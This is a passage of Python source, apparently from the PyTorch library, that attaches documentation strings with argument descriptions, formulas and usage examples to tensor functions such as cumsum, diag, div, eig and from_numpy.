[-1.1626, 0.7180, -0.0521],
[-0.1339, 0.9902, -2.0225]])
>>> b = torch.randn(4, 3)
>>> b
tensor([[-0.0257, -1.4725, -1.2251],
[-1.1479, -0.7005, -1.9757],
[-1.3904, 0.3726, -1.1836],
[-0.9688, -0.7153, 0.2159]])
>>> torch.cross(a, b, dim=1)
tensor([[ 1.0844, -0.5281, 0.6120],
[-2.4490, -1.5687, 1.9792],
[-0.8304, -1.3037, 0.5650],
[-1.2329, 1.9883, 1.0551]])
>>> torch.cross(a, b)
tensor([[ 1.0844, -0.5281, 0.6120],
[-2.4490, -1.5687, 1.9792],
[-0.8304, -1.3037, 0.5650],
[-1.2329, 1.9883, 1.0551]])
""".format(**common_args))
add_docstr(torch.logcumsumexp,
r"""
logcumsumexp(input, dim, *, out=None) -> Tensor
Returns the logarithm of the cumulative summation of the exponentiation of
elements of :attr:`input` in the dimension :attr:`dim`.
For summation index :math:`j` given by `dim` and other indices :math:`i`, the result is
.. math::
\text{{logcumsumexp}}(x)_{{ij}} = \log \sum\limits_{{j=0}}^{{i}} \exp(x_{{ij}})
Args:
{input}
dim (int): the dimension to do the operation over
Keyword args:
{out}
Example::
>>> a = torch.randn(10)
>>> torch.logcumsumexp(a, dim=0)
tensor([-0.42296738, -0.04462666, 0.86278635, 0.94622083, 1.05277811,
1.39202815, 1.83525007, 1.84492621, 2.06084887, 2.06844475]))
""".format(**reduceops_common_args))
add_docstr(torch.cummax,
r"""
cummax(input, dim, *, out=None) -> (Tensor, LongTensor)
Returns a namedtuple ``(values, indices)`` where ``values`` is the cumulative maximum of
elements of :attr:`input` in the dimension :attr:`dim`. And ``indices`` is the index
location of each maximum value found in the dimension :attr:`dim`.
.. math::
y_i = max(x_1, x_2, x_3, \dots, x_i)
Args:
{input}
dim (int): the dimension to do the operation over
Keyword args:
out (tuple, optional): the result tuple of two output tensors (values, indices)
Example::
>>> a = torch.randn(10)
>>> a
tensor([-0.3449, -1.5447, 0.0685, -1.5104, -1.1706, 0.2259, 1.4696, -1.3284,
1.9946, -0.8209])
>>> torch.cummax(a, dim=0)
torch.return_types.cummax(
values=tensor([-0.3449, -0.3449, 0.0685, 0.0685, 0.0685, 0.2259, 1.4696, 1.4696,
1.9946, 1.9946]),
indices=tensor([0, 0, 2, 2, 2, 5, 6, 6, 8, 8]))
""".format(**reduceops_common_args))
add_docstr(torch.cummin,
r"""
cummin(input, dim, *, out=None) -> (Tensor, LongTensor)
Returns a namedtuple ``(values, indices)`` where ``values`` is the cumulative minimum of
elements of :attr:`input` in the dimension :attr:`dim`. And ``indices`` is the index
location of each maximum value found in the dimension :attr:`dim`.
.. math::
y_i = min(x_1, x_2, x_3, \dots, x_i)
Args:
{input}
dim (int): the dimension to do the operation over
Keyword args:
out (tuple, optional): the result tuple of two output tensors (values, indices)
Example::
>>> a = torch.randn(10)
>>> a
tensor([-0.2284, -0.6628, 0.0975, 0.2680, -1.3298, -0.4220, -0.3885, 1.1762,
0.9165, 1.6684])
>>> torch.cummin(a, dim=0)
torch.return_types.cummin(
values=tensor([-0.2284, -0.6628, -0.6628, -0.6628, -1.3298, -1.3298, -1.3298, -1.3298,
-1.3298, -1.3298]),
indices=tensor([0, 1, 1, 1, 4, 4, 4, 4, 4, 4]))
""".format(**reduceops_common_args))
add_docstr(torch.cumprod,
r"""
cumprod(input, dim, *, dtype=None, out=None) -> Tensor
Returns the cumulative product of elements of :attr:`input` in the dimension
:attr:`dim`.
For example, if :attr:`input` is a vector of size N, the result will also be
a vector of size N, with elements.
.. math::
y_i = x_1 \times x_2\times x_3\times \dots \times x_i
Args:
{input}
dim (int): the dimension to do the operation over
Keyword args:
{dtype}
{out}
Example::
>>> a = torch.randn(10)
>>> a
tensor([ 0.6001, 0.2069, -0.1919, 0.9792, 0.6727, 1.0062, 0.4126,
-0.2129, -0.4206, 0.1968])
>>> torch.cumprod(a, dim=0)
tensor([ 0.6001, 0.1241, -0.0238, -0.0233, -0.0157, -0.0158, -0.0065,
0.0014, -0.0006, -0.0001])
>>> a[5] = 0.0
>>> torch.cumprod(a, dim=0)
tensor([ 0.6001, 0.1241, -0.0238, -0.0233, -0.0157, -0.0000, -0.0000,
0.0000, -0.0000, -0.0000])
""".format(**reduceops_common_args))
add_docstr(torch.cumsum,
r"""
cumsum(input, dim, *, dtype=None, out=None) -> Tensor
Returns the cumulative sum of elements of :attr:`input` in the dimension
:attr:`dim`.
For example, if :attr:`input` is a vector of size N, the result will also be
a vector of size N, with elements.
.. math::
y_i = x_1 + x_2 + x_3 + \dots + x_i
Args:
{input}
dim (int): the dimension to do the operation over
Keyword args:
{dtype}
{out}
Example::
>>> a = torch.randn(10)
>>> a
tensor([-0.8286, -0.4890, 0.5155, 0.8443, 0.1865, -0.1752, -2.0595,
0.1850, -1.1571, -0.4243])
>>> torch.cumsum(a, dim=0)
tensor([-0.8286, -1.3175, -0.8020, 0.0423, 0.2289, 0.0537, -2.0058,
-1.8209, -2.9780, -3.4022])
""".format(**reduceops_common_args))
add_docstr(torch.count_nonzero,
r"""
count_nonzero(input, dim=None) -> Tensor
Counts the number of non-zero values in the tensor :attr:`input` along the given :attr:`dim`.
If no dim is specified then all non-zeros in the tensor are counted.
Args:
{input}
dim (int or tuple of ints, optional): Dim or tuple of dims along which to count non-zeros.
Example::
>>> x = torch.zeros(3,3)
>>> x[torch.randn(3,3) > 0.5] = 1
>>> x
tensor([[0., 1., 1.],
[0., 0., 0.],
[0., 0., 1.]])
>>> torch.count_nonzero(x)
tensor(3)
>>> torch.count_nonzero(x, dim=0)
tensor([0, 1, 2])
""".format(**reduceops_common_args))
add_docstr(torch.dequantize,
r"""
dequantize(tensor) -> Tensor
Returns an fp32 Tensor by dequantizing a quantized Tensor
Args:
tensor (Tensor): A quantized Tensor
.. function:: dequantize(tensors) -> sequence of Tensors
:noindex:
Given a list of quantized Tensors, dequantize them and return a list of fp32 Tensors
Args:
tensors (sequence of Tensors): A list of quantized Tensors
""")
add_docstr(torch.diag,
r"""
diag(input, diagonal=0, *, out=None) -> Tensor
- If :attr:`input` is a vector (1-D tensor), then returns a 2-D square tensor
with the elements of :attr:`input` as the diagonal.
- If :attr:`input` is a matrix (2-D tensor), then returns a 1-D tensor with
the diagonal elements of :attr:`input`.
The argument :attr:`diagonal` controls which diagonal to consider:
- If :attr:`diagonal` = 0, it is the main diagonal.
- If :attr:`diagonal` > 0, it is above the main diagonal.
- If :attr:`diagonal` < 0, it is below the main diagonal.
Args:
{input}
diagonal (int, optional): the diagonal to consider
Keyword args:
{out}
.. seealso::
:func:`torch.diagonal` always returns the diagonal of its input.
:func:`torch.diagflat` always constructs a tensor with diagonal elements
specified by the input.
Examples:
Get the square matrix where the input vector is the diagonal::
>>> a = torch.randn(3)
>>> a
tensor([ 0.5950,-0.0872, 2.3298])
>>> torch.diag(a)
tensor([[ 0.5950, 0.0000, 0.0000],
[ 0.0000,-0.0872, 0.0000],
[ 0.0000, 0.0000, 2.3298]])
>>> torch.diag(a, 1)
tensor([[ 0.0000, 0.5950, 0.0000, 0.0000],
[ 0.0000, 0.0000,-0.0872, 0.0000],
[ 0.0000, 0.0000, 0.0000, 2.3298],
[ 0.0000, 0.0000, 0.0000, 0.0000]])
Get the k-th diagonal of a given matrix::
>>> a = torch.randn(3, 3)
>>> a
tensor([[-0.4264, 0.0255,-0.1064],
[ 0.8795,-0.2429, 0.1374],
[ 0.1029,-0.6482,-1.6300]])
>>> torch.diag(a, 0)
tensor([-0.4264,-0.2429,-1.6300])
>>> torch.diag(a, 1)
tensor([ 0.0255, 0.1374])
""".format(**common_args))
add_docstr(torch.diag_embed,
r"""
diag_embed(input, offset=0, dim1=-2, dim2=-1) -> Tensor
Creates a tensor whose diagonals of certain 2D planes (specified by
:attr:`dim1` and :attr:`dim2`) are filled by :attr:`input`.
To facilitate creating batched diagonal matrices, the 2D planes formed by
the last two dimensions of the returned tensor are chosen by default.
The argument :attr:`offset` controls which diagonal to consider:
- If :attr:`offset` = 0, it is the main diagonal.
- If :attr:`offset` > 0, it is above the main diagonal.
- If :attr:`offset` < 0, it is below the main diagonal.
The size of the new matrix will be calculated to make the specified diagonal
of the size of the last input dimension.
Note that for :attr:`offset` other than :math:`0`, the order of :attr:`dim1`
and :attr:`dim2` matters. Exchanging them is equivalent to changing the
sign of :attr:`offset`.
Applying :meth:`torch.diagonal` to the output of this function with
the same arguments yields a matrix identical to input. However,
:meth:`torch.diagonal` has different default dimensions, so those
need to be explicitly specified.
Args:
{input} Must be at least 1-dimensional.
offset (int, optional): which diagonal to consider. Default: 0
(main diagonal).
dim1 (int, optional): first dimension with respect to which to
take diagonal. Default: -2.
dim2 (int, optional): second dimension with respect to which to
take diagonal. Default: -1.
Example::
>>> a = torch.randn(2, 3)
>>> torch.diag_embed(a)
tensor([[[ 1.5410, 0.0000, 0.0000],
[ 0.0000, -0.2934, 0.0000],
[ 0.0000, 0.0000, -2.1788]],
[[ 0.5684, 0.0000, 0.0000],
[ 0.0000, -1.0845, 0.0000],
[ 0.0000, 0.0000, -1.3986]]])
>>> torch.diag_embed(a, offset=1, dim1=0, dim2=2)
tensor([[[ 0.0000, 1.5410, 0.0000, 0.0000],
[ 0.0000, 0.5684, 0.0000, 0.0000]],
[[ 0.0000, 0.0000, -0.2934, 0.0000],
[ 0.0000, 0.0000, -1.0845, 0.0000]],
[[ 0.0000, 0.0000, 0.0000, -2.1788],
[ 0.0000, 0.0000, 0.0000, -1.3986]],
[[ 0.0000, 0.0000, 0.0000, 0.0000],
[ 0.0000, 0.0000, 0.0000, 0.0000]]])
""".format(**common_args))
add_docstr(torch.diagflat,
r"""
diagflat(input, offset=0) -> Tensor
- If :attr:`input` is a vector (1-D tensor), then returns a 2-D square tensor
with the elements of :attr:`input` as the diagonal.
- If :attr:`input` is a tensor with more than one dimension, then returns a
2-D tensor with diagonal elements equal to a flattened :attr:`input`.
The argument :attr:`offset` controls which diagonal to consider:
- If :attr:`offset` = 0, it is the main diagonal.
- If :attr:`offset` > 0, it is above the main diagonal.
- If :attr:`offset` < 0, it is below the main diagonal.
Args:
{input}
offset (int, optional): the diagonal to consider. Default: 0 (main
diagonal).
Examples::
>>> a = torch.randn(3)
>>> a
tensor([-0.2956, -0.9068, 0.1695])
>>> torch.diagflat(a)
tensor([[-0.2956, 0.0000, 0.0000],
[ 0.0000, -0.9068, 0.0000],
[ 0.0000, 0.0000, 0.1695]])
>>> torch.diagflat(a, 1)
tensor([[ 0.0000, -0.2956, 0.0000, 0.0000],
[ 0.0000, 0.0000, -0.9068, 0.0000],
[ 0.0000, 0.0000, 0.0000, 0.1695],
[ 0.0000, 0.0000, 0.0000, 0.0000]])
>>> a = torch.randn(2, 2)
>>> a
tensor([[ 0.2094, -0.3018],
[-0.1516, 1.9342]])
>>> torch.diagflat(a)
tensor([[ 0.2094, 0.0000, 0.0000, 0.0000],
[ 0.0000, -0.3018, 0.0000, 0.0000],
[ 0.0000, 0.0000, -0.1516, 0.0000],
[ 0.0000, 0.0000, 0.0000, 1.9342]])
""".format(**common_args))
add_docstr(torch.diagonal,
r"""
diagonal(input, offset=0, dim1=0, dim2=1) -> Tensor
Returns a partial view of :attr:`input` with the its diagonal elements
with respect to :attr:`dim1` and :attr:`dim2` appended as a dimension
at the end of the shape.
The argument :attr:`offset` controls which diagonal to consider:
- If :attr:`offset` = 0, it is the main diagonal.
- If :attr:`offset` > 0, it is above the main diagonal.
- If :attr:`offset` < 0, it is below the main diagonal.
Applying :meth:`torch.diag_embed` to the output of this function with
the same arguments yields a diagonal matrix with the diagonal entries
of the input. However, :meth:`torch.diag_embed` has different default
dimensions, so those need to be explicitly specified.
Args:
{input} Must be at least 2-dimensional.
offset (int, optional): which diagonal to consider. Default: 0
(main diagonal).
dim1 (int, optional): first dimension with respect to which to
take diagonal. Default: 0.
dim2 (int, optional): second dimension with respect to which to
take diagonal. Default: 1.
.. note:: To take a batch diagonal, pass in dim1=-2, dim2=-1.
Examples::
>>> a = torch.randn(3, 3)
>>> a
tensor([[-1.0854, 1.1431, -0.1752],
[ 0.8536, -0.0905, 0.0360],
[ 0.6927, -0.3735, -0.4945]])
>>> torch.diagonal(a, 0)
tensor([-1.0854, -0.0905, -0.4945])
>>> torch.diagonal(a, 1)
tensor([ 1.1431, 0.0360])
>>> x = torch.randn(2, 5, 4, 2)
>>> torch.diagonal(x, offset=-1, dim1=1, dim2=2)
tensor([[[-1.2631, 0.3755, -1.5977, -1.8172],
[-1.1065, 1.0401, -0.2235, -0.7938]],
[[-1.7325, -0.3081, 0.6166, 0.2335],
[ 1.0500, 0.7336, -0.3836, -1.1015]]])
""".format(**common_args))
add_docstr(torch.diagonal_scatter,
r"""
diagonal_scatter(input, src, offset=0, dim1=0, dim2=1) -> Tensor
Embeds the values of the :attr:`src` tensor into :attr:`input` along
the diagonal elements of :attr:`input`, with respect to :attr:`dim1`
and :attr:`dim2`.
This function returns a tensor with fresh storage; it does not
return a view.
The argument :attr:`offset` controls which diagonal to consider:
- If :attr:`offset` = 0, it is the main diagonal.
- If :attr:`offset` > 0, it is above the main diagonal.
- If :attr:`offset` < 0, it is below the main diagonal.
Args:
{input} Must be at least 2-dimensional.
src (Tensor): the tensor to embed into :attr:`input`.
offset (int, optional): which diagonal to consider. Default: 0
(main diagonal).
dim1 (int, optional): first dimension with respect to which to
take diagonal. Default: 0.
dim2 (int, optional): second dimension with respect to which to
take diagonal. Default: 1.
.. note::
:attr:`src` must be of the proper size in order to be embedded
into :attr:`input`. Specifically, it should have the same shape as
``torch.diagonal(input, offset, dim1, dim2)``
Examples::
>>> a = torch.zeros(3, 3)
>>> a
tensor([[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]])
>>> torch.diagonal_scatter(a, torch.ones(3), 0)
tensor([[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]])
>>> torch.diagonal_scatter(a, torch.ones(2), 1)
tensor([[0., 1., 0.],
[0., 0., 1.],
[0., 0., 0.]])
""".format(**common_args))
add_docstr(torch.diff, r"""
diff(input, n=1, dim=-1, prepend=None, append=None) -> Tensor
Computes the n-th forward difference along the given dimension.
The first-order differences are given by `out[i] = input[i + 1] - input[i]`. Higher-order
differences are calculated by using :func:`torch.diff` recursively.
Args:
input (Tensor): the tensor to compute the differences on
n (int, optional): the number of times to recursively compute the difference
dim (int, optional): the dimension to compute the difference along.
Default is the last dimension.
prepend, append (Tensor, optional): values to prepend or append to
:attr:`input` along :attr:`dim` before computing the difference.
Their dimensions must be equivalent to that of input, and their shapes
must match input's shape except on :attr:`dim`.
Keyword args:
{out}
Example::
>>> a = torch.tensor([1, 3, 2])
>>> torch.diff(a)
tensor([ 2, -1])
>>> b = torch.tensor([4, 5])
>>> torch.diff(a, append=b)
tensor([ 2, -1, 2, 1])
>>> c = torch.tensor([[1, 2, 3], [3, 4, 5]])
>>> torch.diff(c, dim=0)
tensor([[2, 2, 2]])
>>> torch.diff(c, dim=1)
tensor([[1, 1],
[1, 1]])
""".format(**common_args))
add_docstr(torch.digamma, r"""
digamma(input, *, out=None) -> Tensor
Alias for :func:`torch.special.digamma`.
""")
add_docstr(torch.dist,
r"""
dist(input, other, p=2) -> Tensor
Returns the p-norm of (:attr:`input` - :attr:`other`)
The shapes of :attr:`input` and :attr:`other` must be
:ref:`broadcastable <broadcasting-semantics>`.
Args:
{input}
other (Tensor): the Right-hand-side input tensor
p (float, optional): the norm to be computed
Example::
>>> x = torch.randn(4)
>>> x
tensor([-1.5393, -0.8675, 0.5916, 1.6321])
>>> y = torch.randn(4)
>>> y
tensor([ 0.0967, -1.0511, 0.6295, 0.8360])
>>> torch.dist(x, y, 3.5)
tensor(1.6727)
>>> torch.dist(x, y, 3)
tensor(1.6973)
>>> torch.dist(x, y, 0)
tensor(inf)
>>> torch.dist(x, y, 1)
tensor(2.6537)
""".format(**common_args))
add_docstr(torch.div, r"""
div(input, other, *, rounding_mode=None, out=None) -> Tensor
Divides each element of the input ``input`` by the corresponding element of
:attr:`other`.
.. math::
\text{{out}}_i = \frac{{\text{{input}}_i}}{{\text{{other}}_i}}
.. note::
By default, this performs a "true" division like Python 3.
See the :attr:`rounding_mode` argument for floor division.
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer, float, and complex inputs.
Always promotes integer types to the default scalar type.
Args:
input (Tensor): the dividend
other (Tensor or Number): the divisor
Keyword args:
rounding_mode (str, optional): Type of rounding applied to the result:
* None - default behavior. Performs no rounding and, if both :attr:`input` and
:attr:`other` are integer types, promotes the inputs to the default scalar type.
Equivalent to true division in Python (the ``/`` operator) and NumPy's ``np.true_divide``.
* ``"trunc"`` - rounds the results of the division towards zero.
Equivalent to C-style integer division.
* ``"floor"`` - rounds the results of the division down.
Equivalent to floor division in Python (the ``//`` operator) and NumPy's ``np.floor_divide``.
{out}
Examples::
>>> x = torch.tensor([ 0.3810, 1.2774, -0.2972, -0.3719, 0.4637])
>>> torch.div(x, 0.5)
tensor([ 0.7620, 2.5548, -0.5944, -0.7438, 0.9274])
>>> a = torch.tensor([[-0.3711, -1.9353, -0.4605, -0.2917],
... [ 0.1815, -1.0111, 0.9805, -1.5923],
... [ 0.1062, 1.4581, 0.7759, -1.2344],
... [-0.1830, -0.0313, 1.1908, -1.4757]])
>>> b = torch.tensor([ 0.8032, 0.2930, -0.8113, -0.2308])
>>> torch.div(a, b)
tensor([[-0.4620, -6.6051, 0.5676, 1.2639],
[ 0.2260, -3.4509, -1.2086, 6.8990],
[ 0.1322, 4.9764, -0.9564, 5.3484],
[-0.2278, -0.1068, -1.4678, 6.3938]])
>>> torch.div(a, b, rounding_mode='trunc')
tensor([[-0., -6., 0., 1.],
[ 0., -3., -1., 6.],
[ 0., 4., -0., 5.],
[-0., -0., -1., 6.]])
>>> torch.div(a, b, rounding_mode='floor')
tensor([[-1., -7., 0., 1.],
[ 0., -4., -2., 6.],
[ 0., 4., -1., 5.],
[-1., -1., -2., 6.]])
""".format(**common_args))
add_docstr(torch.divide, r"""
divide(input, other, *, rounding_mode=None, out=None) -> Tensor
Alias for :func:`torch.div`.
""")
add_docstr(torch.dot,
r"""
dot(input, other, *, out=None) -> Tensor
Computes the dot product of two 1D tensors.
.. note::
Unlike NumPy's dot, torch.dot intentionally only supports computing the dot product
of two 1D tensors with the same number of elements.
Args:
input (Tensor): first tensor in the dot product, must be 1D.
other (Tensor): second tensor in the dot product, must be 1D.
Keyword args:
{out}
Example::
>>> torch.dot(torch.tensor([2, 3]), torch.tensor([2, 1]))
tensor(7)
""".format(**common_args))
add_docstr(torch.vdot,
r"""
vdot(input, other, *, out=None) -> Tensor
Computes the dot product of two 1D tensors. The vdot(a, b) function handles complex numbers
differently than dot(a, b). If the first argument is complex, the complex conjugate of the
first argument is used for the calculation of the dot product.
.. note::
Unlike NumPy's vdot, torch.vdot intentionally only supports computing the dot product
of two 1D tensors with the same number of elements.
Args:
input (Tensor): first tensor in the dot product, must be 1D. Its conjugate is used if it's complex.
other (Tensor): second tensor in the dot product, must be 1D.
Keyword args:
{out}
Example::
>>> torch.vdot(torch.tensor([2, 3]), torch.tensor([2, 1]))
tensor(7)
>>> a = torch.tensor((1 +2j, 3 - 1j))
>>> b = torch.tensor((2 +1j, 4 - 0j))
>>> torch.vdot(a, b)
tensor([16.+1.j])
>>> torch.vdot(b, a)
tensor([16.-1.j])
""".format(**common_args))
add_docstr(torch.eig,
r"""
eig(input, eigenvectors=False, *, out=None) -> (Tensor, Tensor)
Computes the eigenvalues and eigenvectors of a real square matrix.
.. note::
Since eigenvalues and eigenvectors might be complex, backward pass is supported only
if eigenvalues and eigenvectors are all real valued.
When :attr:`input` is on CUDA, :func:`torch.eig() <torch.eig>` causes
host-device synchronization.
.. warning::
:func:`torch.eig` is deprecated in favor of :func:`torch.linalg.eig`
and will be removed in a future PyTorch release.
:func:`torch.linalg.eig` returns complex tensors of dtype `cfloat` or `cdouble`
rather than real tensors mimicking complex tensors.
``L, _ = torch.eig(A)`` should be replaced with
.. code :: python
L_complex = torch.linalg.eigvals(A)
``L, V = torch.eig(A, eigenvectors=True)`` should be replaced with
.. code :: python
L_complex, V_complex = torch.linalg.eig(A)
Args:
input (Tensor): the square matrix of shape :math:`(n \times n)` for which the eigenvalues and eigenvectors
will be computed
eigenvectors (bool): ``True`` to compute both eigenvalues and eigenvectors;
otherwise, only eigenvalues will be computed
Keyword args:
out (tuple, optional): the output tensors
Returns:
(Tensor, Tensor): A namedtuple (eigenvalues, eigenvectors) containing
- **eigenvalues** (*Tensor*): Shape :math:`(n \times 2)`. Each row is an eigenvalue of ``input``,
where the first element is the real part and the second element is the imaginary part.
The eigenvalues are not necessarily ordered.
- **eigenvectors** (*Tensor*): If ``eigenvectors=False``, it's an empty tensor.
Otherwise, this tensor of shape :math:`(n \times n)` can be used to compute normalized (unit length)
eigenvectors of corresponding eigenvalues as follows.
If the corresponding `eigenvalues[j]` is a real number, column `eigenvectors[:, j]` is the eigenvector
corresponding to `eigenvalues[j]`.
If the corresponding `eigenvalues[j]` and `eigenvalues[j + 1]` form a complex conjugate pair, then the
true eigenvectors can be computed as
:math:`\text{true eigenvector}[j] = eigenvectors[:, j] + i \times eigenvectors[:, j + 1]`,
:math:`\text{true eigenvector}[j + 1] = eigenvectors[:, j] - i \times eigenvectors[:, j + 1]`.
Example::
Trivial example with a diagonal matrix. By default, only eigenvalues are computed:
>>> a = torch.diag(torch.tensor([1, 2, 3], dtype=torch.double))
>>> e, v = torch.eig(a)
>>> e
tensor([[1., 0.],
[2., 0.],
[3., 0.]], dtype=torch.float64)
>>> v
tensor([], dtype=torch.float64)
Compute also the eigenvectors:
>>> e, v = torch.eig(a, eigenvectors=True)
>>> e
tensor([[1., 0.],
[2., 0.],
[3., 0.]], dtype=torch.float64)
>>> v
tensor([[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]], dtype=torch.float64)
""")
add_docstr(torch.eq, r"""
eq(input, other, *, out=None) -> Tensor
Computes element-wise equality
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or float): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is equal to :attr:`other` and False elsewhere
Example::
>>> torch.eq(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[ True, False],
[False, True]])
""".format(**common_args))
add_docstr(torch.equal,
r"""
equal(input, other) -> bool
``True`` if two tensors have the same size and elements, ``False`` otherwise.
Example::
>>> torch.equal(torch.tensor([1, 2]), torch.tensor([1, 2]))
True
""")
add_docstr(torch.erf,
r"""
erf(input, *, out=None) -> Tensor
Alias for :func:`torch.special.erf`.
""")
add_docstr(torch.erfc,
r"""
erfc(input, *, out=None) -> Tensor
Alias for :func:`torch.special.erfc`.
""")
add_docstr(torch.erfinv,
r"""
erfinv(input, *, out=None) -> Tensor
Alias for :func:`torch.special.erfinv`.
""")
add_docstr(torch.exp,
r"""
exp(input, *, out=None) -> Tensor
Returns a new tensor with the exponential of the elements
of the input tensor :attr:`input`.
.. math::
y_{i} = e^{x_{i}}
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> torch.exp(torch.tensor([0, math.log(2.)]))
tensor([ 1., 2.])
""".format(**common_args))
add_docstr(torch.exp2,
r"""
exp2(input, *, out=None) -> Tensor
Alias for :func:`torch.special.exp2`.
""")
add_docstr(torch.expm1,
r"""
expm1(input, *, out=None) -> Tensor
Alias for :func:`torch.special.expm1`.
""")
add_docstr(torch.eye,
r"""
eye(n, m=None, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a 2-D tensor with ones on the diagonal and zeros elsewhere.
Args:
n (int): the number of rows
m (int, optional): the number of columns with default being :attr:`n`
Keyword arguments:
{out}
{dtype}
{layout}
{device}
{requires_grad}
Returns:
Tensor: A 2-D tensor with ones on the diagonal and zeros elsewhere
Example::
>>> torch.eye(3)
tensor([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
""".format(**factory_common_args))
add_docstr(torch.floor,
r"""
floor(input, *, out=None) -> Tensor
Returns a new tensor with the floor of the elements of :attr:`input`,
the largest integer less than or equal to each element.
.. math::
\text{out}_{i} = \left\lfloor \text{input}_{i} \right\rfloor
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.8166, 1.5308, -0.2530, -0.2091])
>>> torch.floor(a)
tensor([-1., 1., -1., -1.])
""".format(**common_args))
add_docstr(torch.floor_divide, r"""
floor_divide(input, other, *, out=None) -> Tensor
.. warning::
:func:`torch.floor_divide` is deprecated and will be removed in a future PyTorch
release. Its name is a misnomer because it actually rounds the quotient
towards zero instead of taking its floor. To keep the current behavior use
:func:`torch.div` with ``rounding_mode='trunc'``. To actually perform floor
division, use :func:`torch.div` with ``rounding_mode='floor'``.
Computes :attr:`input` divided by :attr:`other`, elementwise, and rounds each
quotient towards zero. Equivalently, it truncates the quotient(s):
.. math::
\text{{out}}_i = \text{trunc} \left( \frac{{\text{{input}}_i}}{{\text{{other}}_i}} \right)
""" + r"""
Supports broadcasting to a common shape, type promotion, and integer and float inputs.
Args:
input (Tensor or Number): the dividend
other (Tensor or Number): the divisor
Keyword args:
{out}
Example::
>>> a = torch.tensor([4.0, 3.0])
>>> b = torch.tensor([2.0, 2.0])
>>> torch.floor_divide(a, b)
tensor([2.0, 1.0])
>>> torch.floor_divide(a, 1.4)
tensor([2.0, 2.0])
""".format(**common_args))
add_docstr(torch.fmod,
r"""
fmod(input, other, *, out=None) -> Tensor
Applies C++'s `std::fmod <https://en.cppreference.com/w/cpp/numeric/math/fmod>`_
for floating point tensors, and the modulus operation for integer tensors. The result
has the same sign as the dividend :attr:`input` and its absolute value
is less than that of :attr:`other`.
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer and float inputs.
.. note::
When the divisor is zero, returns ``NaN`` for floating point dtypes
on both CPU and GPU; raises ``RuntimeError`` for integer division by
zero on CPU; Integer division by zero on GPU may return any value.
.. note::
Complex inputs are not supported. In some cases, it is not mathematically
possible to satisfy the definition of a modulo operation with complex numbers.
Args:
input (Tensor): the dividend
other (Tensor or Scalar): the divisor
Keyword args:
{out}
Example::
>>> torch.fmod(torch.tensor([-3., -2, -1, 1, 2, 3]), 2)
tensor([-1., -0., -1., 1., 0., 1.])
>>> torch.fmod(torch.tensor([1, 2, 3, 4, 5]), -1.5)
tensor([1.0000, 0.5000, 0.0000, 1.0000, 0.5000])
.. seealso::
:func:`torch.remainder` which is similar to :func:`torch.fmod` except that if the sign
of the modulus is different than the sign of the divisor :attr:`other` then the divisor
is added to the modulus.
""".format(**common_args))
add_docstr(torch.frac,
r"""
frac(input, *, out=None) -> Tensor
Computes the fractional portion of each element in :attr:`input`.
.. math::
\text{out}_{i} = \text{input}_{i} - \left\lfloor |\text{input}_{i}| \right\rfloor * \operatorname{sgn}(\text{input}_{i})
Example::
>>> torch.frac(torch.tensor([1, 2.5, -3.2]))
tensor([ 0.0000, 0.5000, -0.2000])
""")
add_docstr(torch.frexp,
r"""
frexp(input, *, out=None) -> (Tensor mantissa, Tensor exponent)
Decomposes :attr:`input` into mantissa and exponent tensors
such that :math:`\text{input} = \text{mantissa} \times 2^{\text{exponent}}`.
The range of mantissa is the open interval (-1, 1).
Supports float inputs.
Args:
input (Tensor): the input tensor
Keyword args:
out (tuple, optional): the output tensors
Example::
>>> x = torch.arange(9.)
>>> mantissa, exponent = torch.frexp(x)
>>> mantissa
tensor([0.0000, 0.5000, 0.5000, 0.7500, 0.5000, 0.6250, 0.7500, 0.8750, 0.5000])
>>> exponent
tensor([0, 1, 2, 2, 3, 3, 3, 3, 4], dtype=torch.int32)
>>> torch.ldexp(mantissa, exponent)
tensor([0., 1., 2., 3., 4., 5., 6., 7., 8.])
""")
add_docstr(torch.from_numpy,
r"""
from_numpy(ndarray) -> Tensor
Creates a :class:`Tensor` from a :class:`numpy.ndarray`.
The returned tensor and :attr:`ndarray` share the same memory. Modifications to
the tensor will be reflected in the :attr:`ndarray` and vice versa. The returned
tensor is not resizable.
It currently accepts :attr:`ndarray` with dtypes of ``numpy.float64``,
``numpy.float32``, ``numpy.float16``, ``numpy.complex64``, ``numpy.complex128``,
``numpy.int64``, ``numpy.int32``, ``numpy.int16``, ``numpy.int8``, ``numpy.uint8``,
and ``numpy.bool``.
.. warning::
Writing to a tensor created from a read-only NumPy array is not supported and will result in undefined behavior.
Example::
>>> a = numpy.array([1, 2, 3])
>>> t = torch.from_numpy(a)
>>> t
tensor([ 1, 2, 3])
>>> t[0] = -1
>>> a
array([-1, 2, 3])
""")
add_docstr(torch.frombuffer,
r"""
frombuffer(buffer, *, dtype, count=-1, offset=0, requires_grad=False) -> Tensor
Creates a 1-dimensional :class:`Tensor` from an object that implements
the Python buffer protocol.
Skips the first :attr:`offset` bytes in the buffer, and interprets the rest of
the raw bytes as a 1-dimensional tensor of type :attr:`dtype` with :attr:`count`
elements.
Note that either of the following must be true:
1. :attr:`count` is a positive non-zero number, and the total number of bytes
in the buffer is less than :attr:`offset` plus :attr:`count` times the size
(in bytes) of :attr:`dtype`.
2. :attr:`count` is negative, and the length (number of bytes) of the buffer
subtracted by the :attr:`offset` is a multiple of the size (in bytes) of
:attr:`dtype`.
The returned tensor and buffer share the same memory. Modifications to
the tensor will be reflected in the buffer and vice versa. The returned
tensor is not resizable.
.. note::
This function increments the reference count for the object that
owns the shared memory. Therefore, such memory will not be deallocated
before the returned tensor goes out of scope.
.. warning::
